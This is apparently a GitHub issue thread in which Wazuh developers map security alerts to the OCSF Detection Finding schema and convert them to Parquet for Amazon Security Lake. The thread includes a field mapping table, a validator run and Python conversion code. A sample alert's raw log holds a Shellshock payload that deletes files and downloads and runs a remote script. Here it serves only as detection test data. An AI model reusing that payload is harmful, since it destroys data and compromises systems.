Closed AlexRuiz7 closed 2 months ago
Has sending the data to a Kinesis Firehose with data transformation to parquet been considered? https://docs.aws.amazon.com/firehose/latest/dev/record-format-conversion.html
Together with @wazuh/threat-intel team, we have worked on generating mappings to transform our data to the OCSF schema. In order to do that, we'll use the Detection Finding (2004) class, added in the v1.1.0 release of OCSF. The first proposal was to use the Security Finding (2001) class, but was discarded due to its deprecation on the latest version of OCSF.
OCSF | Value |
---|---|
category_uid |
2 |
category_name |
Findings |
class_uid |
2004 |
class_name |
Detection Finding |
type_uid |
200401 |
metadata.product.name |
Wazuh |
metadata.product.vendor_name |
Wazuh, Inc,. |
metadata.product.version |
4.9.0 |
metadata.product.lang |
en |
metadata.log_name |
Security events |
metadata.log_provider |
Wazuh |
OCSF (2004) | Wazuh event field |
---|---|
activity_id |
1 |
time |
timestamp |
message |
rule.description |
count |
rule.firedtimes |
finding_info.uid |
id |
finding_info.title |
rule.description |
finding_info.types |
input.type |
finding_info.analytic.category |
rule.groups |
finding_info.analytic.name |
decoder.name |
finding_info.analytic.type |
Rule |
finding_info.analytic.type_id |
1 |
finding_info.analytic.uid |
rule.id |
risk_score |
rule.level |
finding_info.attacks.tactic.name |
rule.mitre.tactic |
finding_info.attacks.technique.name |
rule.mitre.technique |
finding_info.attacks.technique.uid |
rule.mitre.technique |
finding_info.attacks.version |
v13.1 |
unmapped |
rule.nist_800_53 |
severity_id |
convert(rule.level) |
status_id |
99 |
resources.name |
agent.name |
resources.uid |
agent.id |
unmapped |
['_index', 'location', 'manager.name'] |
raw_data |
full_log |
Originally posted by @IsExec in https://github.com/wazuh/internal-devel-requests/issues/699#issuecomment-1933401673
To test these mappings work and lead our data to be OCSF compliant, we have used the validate tool from amazon-security-lake-ocsf-validation, which had to be updated (link redirects to the updated version), together with the CLI Python module parquet-tools
.
parquet-tools show parquet/wazuh-event.ocsf.parquet
+---------------+-----------------+----------------+-------------------+-------------+---------+---------------------------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+------------------------------------------+--------------+---------------+-------------+------------------------------+------------+-------------------------------------------------------------------------------------+
| activity_id | category_name | category_uid | class_name | class_uid | count | message | finding_info | metadata | raw_data | resources | risk_score | severity_id | status_id | time | type_uid | unmapped |
|---------------+-----------------+----------------+-------------------+-------------+---------+---------------------------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+------------------------------------------+--------------+---------------+-------------+------------------------------+------------+-------------------------------------------------------------------------------------|
| 1 | Findings | 2 | Detection Finding | 2004 | 1 | Shellshock attack attempt | {'analytic': {'category': 'web,accesslog,attack', 'name': 'web-accesslog', 'type_id': 1, 'uid': '31166'}, 'attacks': {'tactic': {'name': 'Privilege Escalation,Initial Access'}, 'technique': {'name': 'Exploitation for Privilege Escalation,Exploit Public-Facing Application', 'uid': 'T1068,T1190'}, 'version': 'v13.1'}, 'title': 'Shellshock attack attempt', 'types': array(['log'], dtype=object), 'uid': '1707402914.872885'} | {'log_name': 'Security events', 'log_provider': 'Wazuh', 'product': {'lang': 'en', 'name': 'Wazuh', 'vendor_name': 'Wazuh, Inc,.'}, 'version': '1.1.0'} | 000.111.222.10 - - [08/Feb/2024:11:35:12 -0300] "GET /cgi-bin/jarrewrite.sh HTTP/1.1" 404 162 "-" "() { :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http://0.0.0.0/baddie.sh; chmod 777 baddie.sh; ./baddie.sh'" | [{'name': 'redacted.com', 'uid': '000'}] | 6 | 6 | 99 | 2024-02-08T11:35:14.334-0300 | 200401 | {'data_sources': array(['wazuh-alerts-4.x-2024.02.08', '/var/log/nginx/access.log', |
| | | | | | | | | | | | | | | | | 'redacted.com'], dtype=object), 'nist': array(['SI.4'], dtype=object)} |
+---------------+-----------------+----------------+-------------------+-------------+---------+---------------------------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+------------------------------------------+--------------+---------------+-------------+------------------------------+------------+-------------------------------------------------------------------------------------+
python validate.py -i ../../wazuh-indexer/integrations/amazon-security-lake/parquet/output -version ocsf_schema_1.1.0
Attempting to Validate File: wazuh-event.ocsf.parquet...
Validating Against Event Class: detection_finding (2004)...
VALID OCSF.
```python #!/usr/bin/python # event comes from Filebeat event = {} def normalize(level: int) -> int: """ Normalizes rule level into the 0-6 range, required by OCSF. """ # TODO normalization return level def join(iterable, separator=","): return (separator.join(iterable)) def convert(event: dict) -> dict: """ Converts Wazuh events to OCSF's Detecting Finding (2004) class. """ ocsf_class_template = \ { "activity_id": 1, "category_name": "Findings", "category_uid": 2, "class_name": "Detection Finding", "class_uid": 2004, "count": event["_source"]["rule"]["firedtimes"], "message": event["_source"]["rule"]["description"], "finding_info": { "analytic": { "category": join(event["_source"]["rule"]["groups"]), "name": event["_source"]["decoder"]["name"], "type_id": 1, "uid": event["_source"]["rule"]["id"], }, "attacks": { "tactic": { "name": join(event["_source"]["rule"]["mitre"]["tactic"]), }, "technique": { "name": join(event["_source"]["rule"]["mitre"]["technique"]), "uid": join(event["_source"]["rule"]["mitre"]["id"]), }, "version": "v13.1" }, "title": event["_source"]["rule"]["description"], "types": [ event["_source"]["input"]["type"] ], "uid": event["_source"]['id'] }, "metadata": { "log_name": "Security events", "log_provider": "Wazuh", "product": { "name": "Wazuh", "lang": "en", "vendor_name": "Wazuh, Inc,." }, "version": "1.1.0", }, "raw_data": event["_source"]["full_log"], "resources": [ { "name": event["_source"]["agent"]["name"], "uid": event["_source"]["agent"]["id"] }, ], "risk_score": event["_source"]["rule"]["level"], "severity_id": normalize(event["_source"]["rule"]["level"]), "status_id": 99, "time": event["_source"]["timestamp"], "type_uid": 200401, "unmapped": { "data_sources": [ event["_index"], event["_source"]["location"], event["_source"]["manager"]["name"] ], "nist": event["_source"]["rule"]["nist_800_53"], # Array } } return ocsf_class_template ```
I'm working on an event generator tool to test the integration and ease its development.
Description
Now that we know how OCSF works, how to encode data in Parquet and how to implement a Logstash pipeline to send events to an S3 bucket from
wazuh-indexer
indexes, we need to bundle it all together and prepare the data before sending it to AWS.As explained in #113, we need to somehow transform the data during the pipeline, to later on upload it to the Amazon Security Lake S3 bucket already in OCSF and Parquet.
To transform the data, we'll explore the use of a Lambda function and a Python script. The main difference about these 2 approaches is the resources required, as the first one needs an auxiliary S3 bucket.
Tasks
Subtasks
Definition of done
These two proposals will be worked in parallel. As soon as we manage to get one of these workings, we can consider this issue completed. Once that happens, we'll discuss the next steps.